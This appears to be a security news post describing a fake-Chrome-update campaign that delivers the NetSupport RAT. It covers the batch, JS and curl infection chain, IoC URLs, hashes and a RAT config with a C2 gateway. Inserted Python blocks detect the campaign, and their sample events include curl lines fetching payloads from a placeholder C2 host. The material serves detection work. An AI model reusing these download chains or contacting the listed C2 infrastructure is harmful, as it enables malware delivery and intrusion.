Tuesday, December 24, 2024

Beware of Fake Chrome Browser Updates that Install Malware


Reports indicate an ongoing campaign that lures victims with fake Chrome browser updates into installing NetSupport Manager, a legitimate remote administration tool that is routinely abused as a remote access trojan (RAT).

Threat actors use the remote administration software to steal information from, and take full control of, the victim's computer. Investigators suspect a SocGholish campaign, previously attributed to a Russian threat actor, but attribution remains inconclusive.

Fake Chromium updates campaign (Source: Trellix)

The SVP of Trellix Advanced Research Center stated that “Chromium with 63.55% of market share is now the de facto most targeted browser for NetSupport RAT attacks, due to the global usage. Organizations need holistic global threat intelligence and innovative security solutions to get the governance and tools needed to reduce the cyber risk.”


Fake Chrome Browser Update

These fake Chromium updates are spread through compromised websites into which a single HTML script tag has been injected; the tag loads malicious JavaScript from the threat actors' C2 servers. The injection appears to be automated, and the C2 content follows a consistent directory structure.

Further analysis found many compromised websites with visitors from the federal government, financial institutions, and consulting services. A compromised site can be identified by checking its pages for script content loaded from the “/cdn-js/wds.min.php” path.
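One way to run that check over a site's HTML, as an added example that is not code from the article or from Trellix: collect every script src and match it against the C2 hosts and paths in the IoC list below (de-fanging brackets removed). The page HTML and the host name victim-site.example are constructed for the demo.

```python
# Added example (not code from the article or the Trellix report): look for
# <script src> tags that load content from the campaign's C2 hosts or paths.
# SAMPLE_HTML is constructed for this demo; the hosts and path patterns are
# taken from the article's IoC list with the de-fanging brackets removed.
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

IOC_HOSTS = {"altiordp.com", "cheetahsnv.com", "ponraj.com"}
IOC_PATH_PATTERNS = (
    re.compile(r"/cdn-js/wds\.min\.php$"),
    re.compile(r"/cdn/www\.php$"),
)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        for name, value in attrs:
            if name == "src" and value:
                self.srcs.append(value.strip())


def classify_script_src(src, page_host):
    """Return a reason string if src matches the campaign, else None."""
    parts = urlsplit(src)
    # A relative or protocol-relative src resolves against the page's own host;
    # the query string (e.g. "?964084" on the 1.bat URL) is not part of the path.
    host = (parts.hostname or page_host or "").lower()
    if host in IOC_HOSTS:
        return f"loads from known C2 host {host}"
    for pat in IOC_PATH_PATTERNS:
        if pat.search(parts.path):
            return f"C2 path pattern {pat.pattern} on {host}"
    return None


def find_injected_scripts(html, page_host):
    """Return [(src, reason)] for every script tag that matches the campaign."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    hits = []
    for src in collector.srcs:
        reason = classify_script_src(src, page_host)
        if reason:
            hits.append((src, reason))
    return hits


# Constructed page: one legitimate library, one absolute injected tag, and one
# injected tag that uses a site-relative path.
SAMPLE_HTML = """<html><head>
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
<script src="https://cheetahsnv.com/cdn-js/wds.min.php"></script>
</head><body>
<p>Welcome</p>
<script type="text/javascript" src="/cdn-js/wds.min.php"></script>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_injected_scripts(SAMPLE_HTML, "victim-site.example"):
        print(f"SUSPECT: {src} ({reason})")
```

The path patterns catch the injection even when it is served from a host that is not yet on the IoC list, which matters because the C2 hosts rotate faster than the directory structure does.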

Earlier variants used PowerShell with WMI to download and install the RAT; the current campaign instead relies on batch files (.bat), VBScript, and curl to fetch it.

When a user clicks the fake browser update link, a ZIP archive, “UpdateInstall.zip”, is downloaded. It contains a malicious JavaScript file, “Browser_portable.js”, which acts as a next-stage downloader.

That loader retrieves a second-stage JavaScript file, “Chrome_update.js”, from the threat actors' C2 server and executes it. The second stage writes a batch file, “1.bat”, to the local “C:\ProgramData” folder and runs it.

1.bat in turn drops additional VBScript and batch files that appear to be decoys, since they are never executed. The remaining components and the final batch script, 2.bat, are downloaded with curl commands.

Those components include a standalone 7-Zip executable (7zz.exe) and a 7-Zip archive (tempy.7z) holding the NetSupport Manager RAT package, which 2.bat extracts and executes.
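The chain above (script host running a .js from a user-writable path, a .bat out of C:\ProgramData, curl fetching .bat/.7z/.exe components, 7zz.exe run from ProgramData) is specific enough to correlate in endpoint telemetry. The following is an added example, not code from the article or from Trellix: it walks the parent chain of process-creation events and flags the curl and 7zz activity only when both earlier stages are among its ancestors. The Event records are constructed in a Sysmon Event ID 1 style for the demo, and the hosts c2.example and acme.example are placeholders, not the campaign's infrastructure.

```python
# Added example (not code from the article or Trellix): correlate process-creation
# events into the delivery chain described above. SAMPLE_EVENTS is constructed
# (Sysmon Event ID 1 style fields); c2.example / acme.example are placeholders.
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")


def is_script_host_loader(ev):
    """wscript/cscript running a .js from a user-writable path (Browser_portable.js, Chrome_update.js)."""
    img, cmd = ev.image.lower(), ev.cmdline.lower()
    return (img.endswith(("\\wscript.exe", "\\cscript.exe"))
            and ".js" in cmd
            and any(p in cmd for p in USER_WRITABLE))


def is_programdata_batch(ev):
    """cmd.exe executing a .bat out of C:\\ProgramData (1.bat, 2.bat)."""
    img, cmd = ev.image.lower(), ev.cmdline.lower()
    return (img.endswith("\\cmd.exe")
            and re.search(r'c:\\programdata\\[^\s"]*\.bat', cmd) is not None)


def is_curl_stage_download(ev):
    """curl.exe fetching a .bat/.7z/.exe into C:\\ProgramData."""
    img, cmd = ev.image.lower(), ev.cmdline.lower()
    return (img.endswith("\\curl.exe")
            and "c:\\programdata\\" in cmd
            and re.search(r'\.(bat|7z|exe)(\?\S*)?(\s|"|$)', cmd) is not None)


def is_7z_extract(ev):
    """Standalone 7-Zip (7zz.exe) launched from C:\\ProgramData."""
    img = ev.image.lower()
    return img.startswith("c:\\programdata\\") and img.endswith("\\7zz.exe")


def _ancestors(ev, by_pid):
    """Yield parent, grandparent, ... while the parent is in the event set."""
    seen = set()
    cur = ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        yield cur


def detect_chain(events):
    """Flag curl/7zz activity whose ancestry contains a ProgramData batch AND a script-host loader."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if is_curl_stage_download(ev):
            stage = "stage download via curl"
        elif is_7z_extract(ev):
            stage = "RAT package extraction via 7zz"
        else:
            continue
        anc = list(_ancestors(ev, by_pid))
        if any(is_programdata_batch(a) for a in anc) and any(is_script_host_loader(a) for a in anc):
            findings.append({"pid": ev.pid, "stage": stage, "image": ev.image})
    return findings


SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\jdoe\Downloads\Browser_portable.js"'),
    Event(300, 200, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\jdoe\AppData\Local\Temp\Chrome_update.js"'),
    Event(400, 300, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\ProgramData\1.bat"'),
    Event(500, 400, r"C:\Windows\System32\curl.exe", r"curl.exe -s -o C:\ProgramData\tempy.7z https://c2.example/tempy.7z"),
    Event(600, 400, r"C:\Windows\System32\curl.exe", r"curl.exe -s -o C:\ProgramData\7zz.exe https://c2.example/7zz.exe"),
    Event(700, 400, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\ProgramData\2.bat"'),
    Event(800, 700, r"C:\ProgramData\7zz.exe", r"7zz.exe x C:\ProgramData\tempy.7z -oC:\ProgramData\client"),
    # Benign control: an installer launched by the user fetching its own update into ProgramData.
    Event(900, 100, r"C:\Windows\System32\curl.exe", r"curl.exe -o C:\ProgramData\Acme\update.exe https://acme.example/update.exe"),
]

if __name__ == "__main__":
    for finding in detect_chain(SAMPLE_EVENTS):
        print(finding)
```

Requiring both ancestor stages is what keeps the benign curl download (pid 900) out of the results; a rule on curl-to-ProgramData alone would page on every self-updating installer.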

A complete report has been published by Trellix, which provides detailed information on this campaign and the malware source code.

Indicators of Compromise

hxxps://altiordp[.]com/cdn/www.php
hxxps://cheetahsnv[.]com/cdn-js/wds.min.php
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat?964084
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat

Files (SHA-256)

e67f8b91555993e6315ffa9b146c759b9eeac5208116667fa4b31c717ebe5398 *1.bat
675ede331d690fff93579f9767aa7f80cfbc9d4b99afe298ba3b456ee292ac71 *2.bat
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf *7zz.exe
00cf43f66d27692f25da1771dca7bf8c3c0e5aa78b35090013b013c17ceb0fff *Chrome_update.js
b9711d8d6d1fd59ea9276a70e0b37c28ae26a105c325448e5d62f7858d61b8c2 *UpdateInstaller.zip
7f976e221ece8acac5f6ea32d2ad427a9bcb237e6a6f754043265073cc004ce1 *Browser_portable.js
42679bd369a3b772c43b9ba20bf8a31a2593a360cfa2de77aa6d2023f9a0c109 *tempy.7z

Client32 config
[HTTP]
CMPI=60
GatewayAddress=5.252.178.48:443
GSK=GA;L@KDPHB
Port=443
SecondaryGateway=
SecondaryPort=
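The [HTTP] block above is what a responder pulls from a recovered NetSupport client configuration to learn where the implant beacons. As an added example that is not code from the article or from Trellix, the script below parses that block, extracts the gateway(s), and checks them and any recovered file's SHA-256 against the IoCs listed above. The rule that a bare host in GatewayAddress is combined with the Port key is an assumption for this demo, and the bytes hashed at the end are constructed and match nothing.

```python
# Added example (not code from the article or Trellix): parse a NetSupport
# client32.ini-style [HTTP] section, extract the gateway the client beacons to,
# and check gateways and file hashes against the IoCs listed in the article.
# CLIENT32_INI reproduces the article's config block; the hashed "sample" bytes
# are constructed and will not match any IoC.
import configparser
import hashlib

IOC_SHA256 = {
    "e67f8b91555993e6315ffa9b146c759b9eeac5208116667fa4b31c717ebe5398": "1.bat",
    "675ede331d690fff93579f9767aa7f80cfbc9d4b99afe298ba3b456ee292ac71": "2.bat",
    "c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf": "7zz.exe",
    "00cf43f66d27692f25da1771dca7bf8c3c0e5aa78b35090013b013c17ceb0fff": "Chrome_update.js",
    "b9711d8d6d1fd59ea9276a70e0b37c28ae26a105c325448e5d62f7858d61b8c2": "UpdateInstaller.zip",
    "7f976e221ece8acac5f6ea32d2ad427a9bcb237e6a6f754043265073cc004ce1": "Browser_portable.js",
    "42679bd369a3b772c43b9ba20bf8a31a2593a360cfa2de77aa6d2023f9a0c109": "tempy.7z",
}
IOC_GATEWAYS = {"5.252.178.48:443"}

CLIENT32_INI = """[HTTP]
CMPI=60
GatewayAddress=5.252.178.48:443
GSK=GA;L@KDPHB
Port=443
SecondaryGateway=
SecondaryPort=
"""


def _with_port(host, port):
    """Assumption for this demo: a bare host is paired with the matching Port key."""
    host, port = host.strip(), port.strip()
    if host and ":" not in host and port:
        return f"{host}:{port}"
    return host


def parse_client32(text):
    """Return gateway settings from the [HTTP] section, or None if the section is absent."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str          # keep key case exactly as written in the file
    cp.read_string(text)          # ';' inside a value (the GSK key) is NOT a comment here
    if "HTTP" not in cp:
        return None
    http = cp["HTTP"]
    primary = _with_port(http.get("GatewayAddress", ""), http.get("Port", ""))
    secondary = _with_port(http.get("SecondaryGateway", ""), http.get("SecondaryPort", ""))
    gateways = [g for g in (primary, secondary) if g]
    return {
        "gateways": gateways,
        "gsk": http.get("GSK", "").strip(),
        "cmpi": http.get("CMPI", "").strip(),
        "ioc_match": [g for g in gateways if g in IOC_GATEWAYS],
    }


def match_ioc_hash(data):
    """Return the IoC file name for a blob, or None if its SHA-256 is not listed."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


if __name__ == "__main__":
    cfg = parse_client32(CLIENT32_INI)
    print("gateways:", cfg["gateways"], "IoC match:", cfg["ioc_match"])
    print("constructed blob:", match_ioc_hash(b"@echo off\r\n"))
```

The gateway value is worth more than the hashes in practice: the batch and archive files are trivially rebuilt with new hashes, while the GatewayAddress is the infrastructure the operator has to keep reachable, so it is the value to feed into egress blocks and NetFlow searches.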


Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
